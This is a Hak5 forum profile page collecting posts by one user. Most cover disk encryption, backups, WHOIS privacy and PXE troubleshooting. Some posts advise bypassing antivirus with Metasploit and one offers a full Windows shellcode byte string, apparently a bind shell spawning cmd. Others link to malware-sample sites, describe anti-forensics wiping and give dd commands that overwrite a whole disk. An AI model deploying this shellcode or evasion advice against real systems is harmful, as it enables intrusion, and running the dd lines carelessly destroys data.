-
Posts
160 -
Joined
-
Last visited
-
Days Won
3
Posts posted by int0x80
-
-
I installed Kubuntu 14.04 into a new VM and selected the full system encryption with LVM option during install. After dropping out to BusyBox, I do have cryptsetup available:
(initramfs) which cryptsetup
/sbin/cryptsetupMy guess is that you are using cryptsetup in the live environment that you booted from, but it is not installed into the host OS (your persistent installation). HTH.
-
One good rez deserves another. Mods please forgive me.
Replies inline:
What happens if i lose the usb key or it stops working ? Do i need to back this key up somehow and if so what is the best way.
Definitely back up the drive. I do this with dd -- let's say the USB drive is /dev/sdd in this example:
dd if=/dev/sdd bs=64k of=./boot_usb.img
Should something change like losing your USB drive, physical media degradation, or you just want to switch up your media (and use an SD card, for example); you can write the new device from the acquired image -- let's say the new device is /dev/sde in this example:
dd if=./boot_usb.img bs=64k of=/dev/sde
Now all the bytes are the same and you're good to go.
if you are deriving the key each time then can anyone do it if they had access to that key or they would need to know the offset, which could be computed in no time I am assuming ? especially if like in the example choosing 32 which is near the beginning ?The key needs to be exactly the same in order to decrypt the drive. An attacker would need to know your exact key derivation algorithm to recreate the key. The approach to choosing your own method gives you flexibility here, aka pick your poison: consecutive bytes, every other byte, every third byte, offsets in the Fibonacci sequence, whatever you want. Choose your own adventure -- you just have to do it the same way each time to always recreate the same key.
Keep your operational security (opsec) in mind. Who are your adversaries? Are you worried that BART police might snatch your laptop, for example? Then don't sit under a camera on BART with your keyboard and screen exposed while you decrypt your laptop. You get the idea.
-
I recommend learning to crack software, it's a fun challenge. Here is a good starting point: http://tuts4you.com/download.php?list.17
Keep us updated on your progress. People are more likely to help when you post specific questions showing effort on your part.
-
There are some interesting ideas in the paper "How to Exit the Matrix". I've seen the paper mirrored at different places so just google if you can't find it. At the time of this post, the paper is currently at http://billstclair.com/matrix/
-
You can also grab samples from http://www.malwaredomainlist.com/mdl.php
Also I heard that Offensive Computing will be returning, but run by a different group of people at http://openmalware.org/
-
Actually I've good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions.
-
I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.
You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).
-
Try this:
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
-
I'm surprised there is internet run to Paper St. You're alone for half a mile in every direction, and you have to shut off the power when it rains ;)
-
DBAN over PXE to wipe. If you're going to encrypt, you want a layer of random bytes as your last write to the drive before the encryption.
-
Are you also using Gandi.net for hosting? I too left GoDaddy because of SOPA and went over to domain.com since Hak5 promotes it. I've noticed that you're website is super fast, as is Gandi.net, compared to other websites where I live. However, my website and domain.com loads rather slowly in my part of the world.
Nice, and thanks! My hosting is on a server I colo. Just the DNS and SSL certs are through Gandi.
-
When you have your info public you may get some physical junk mail.
Other than that I went back to public listing to save me some money.
There's that. Also your affiliation with the client may (read: will probably) show up when someone pulls a credit report. IMO, my employer, landlord, bank, et al do not need to know with whom I do business.
If you have to pay extra for it, move to another host. Dreamhost offers private DNS for free as part of the domain name and most domain names are only $9.99/year. Thats for default .coms, org, net, etc. Exotic domain name TLD's however, cost bit more due to country fees. I never heard of a registrar charging for it though. Should be default on most registrars. By default you should be able to even change any aspect of your Whois info. Even GoDaddy (who I would not recommend to anyone) lets you manually edit your Who is info.
Another fun aspect of GoDaddy is that GoDaddy will fine you if someone complains about your fake/inaccurate whois info.
My current registrar is Gandi.net and they have been great; whois privacy is included wrt this thread. I left GoDaddy in a SOPA-induced rage and haven't looked back. Of particular endearment to me was Gandi's No BS policy: https://www.gandi.net/no-bullshit
-
Never heard of that. Got any evidence or documentation?
-
Are you ok with having that information published on the internet?
-
Look into screen or tmux. I have this alias in my ~/.bash_aliases for when I connect and want to re-attach:
alias screenr="screen -raAd"
-
What's your bag? Give people some contextual clues on your interests and experience.
Personally, I'd say get your 2 quid back and get a USB drive :]
-
When I come back into the country, I generally rsync/ssh my data onto a server state-side, then zero the drive on the laptop. That way there is no confusion regarding disk contents.
For good measure I give it a little:
echo -n "Just us zeroes :]" | dd of=/dev/sda seek=$RANDOM
Reference (NSFW) http://pt.reddit.com/r/AskReddit/comments/ndpe1/whats_your_best_it_was_the_most_inappropriate/c38bptk
-
I have to run Windows on a few boxes (one of them an always on server) and am looking for some anti-forensics ideas similar to what int0x80 discussed in his talk at the Louise and his bash scripts on Github. Right now I've got CCleaner, Bleachbit, Clean After Me, and USB Oblivion kicking off as scheduled tasks. Each one runs 6 hours after the other. I've also got BCWipe v5 running Transparent Wiping (any user or system delete calls go through it's driver, and receive a one pass psuedo-random wipe) and an encrypted Swap. I'd love to get a few more ideas from any Windows users...especially for attacking unknown USB devices and generating thousands of dummy files of varying sizes (encrypted).
Thanks.
I haven't done much Windows anti-forensics research, in fact, you've given me some things to look up. One option you could consider is porting my scripts over and running them via cygwin or gnuwin32. If you've got FDE and you're running these wipes in cycles, you should be pretty well set. I haven't seen any Windows stuff that attacks inserted USB devices, but it would be a surprise if such software didn't already exist. Sorry to not be of much help on this one.
-
I generally like http://hardforum.com when I spec a new system. There is a ton to know about hardware, if you're interested. Here is a good link to get started http://hardforum.com/showthread.php?t=1352290
The people there are also mostly helpful, so when you think you have a system shopped out, post a thread as per their FAQ and wait for feedback. Forum members often find better deals on the hardware you want or even better hardware at lower prices.
-
Very cool! I hadn't thought of doing Spinrite, well played :)
-
-
I think the point is to get vbox to direct the guest vm over to the proper destination for pxe. Like vmware, vbox should have its own dhcp setup, so it just needs to be configured properly to get the new guest vm over to the pxe server guest vm. I have a new handle of sj.
-
SO after loading up a different vm in virtualbox with something already on it (centos) I confirmed that dhcp is running fine as it took an address out of a pool of two. But i still cant get it to boot up pxe first... it always fails! It reads 'no boot filename received'
I'm running out of jd and coke tryin to fix these mundane problems!
Just googling around and found a few items:
1. Is the guest vm network adapter connected at power on?
2. Is there a boot filename option specified in the dhcp configuration?
3. Has anyone really been far even as decided to use even go want to do look more like?
You can help me finish off this sailor jerrys if you run out of jack.
-
Very cool! Encrypted volume was not an idea I had considered. That's awesome :D
Today has been a long day and I still have lots to do, so give me some time to look through the code in the next few days and then I can adequately contribute to the thread :]
Ep 1102 Install Using Btr5 R2
in Hak5
Posted
You should be able to, definitely give that a try.
Another more-involved option could be to add cryptsetup into your initrd, but I would go for installing cryptsetup into the target install during the setup process.
Please post your notes/instructions here once you get it figured out. Other people are sure to have the same questions as you.